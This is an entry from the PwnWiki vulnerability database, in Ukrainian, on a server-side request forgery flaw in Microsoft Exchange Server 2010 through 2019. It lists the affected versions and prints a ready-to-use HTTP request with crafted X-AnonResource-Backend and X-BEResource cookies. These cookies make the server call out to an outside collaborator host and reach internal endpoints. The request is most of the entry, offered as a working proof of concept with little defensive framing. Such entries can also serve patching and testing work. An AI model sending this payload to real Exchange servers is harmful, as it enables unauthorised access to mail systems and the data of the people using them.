免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
Вступ до вразливості
Вразливість підробки Exchange на стороні сервера (SSRF). Зловмисник, який використовує цю вразливість, може надсилати довільні HTTP-запити та автентифікуватися через Exchange Server.
Сфера впливу
Microsoft Exchange Server: 2010
Microsoft Exchange Server: 2013
Microsoft Exchange Server: 2016
Microsoft Exchange Server: 2019
SSRF
GET /owa/auth/x.js HTTP/1.1 Host: 0.0.0.0 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; Accept-Language: en Connection: close
PWNWIK.COM
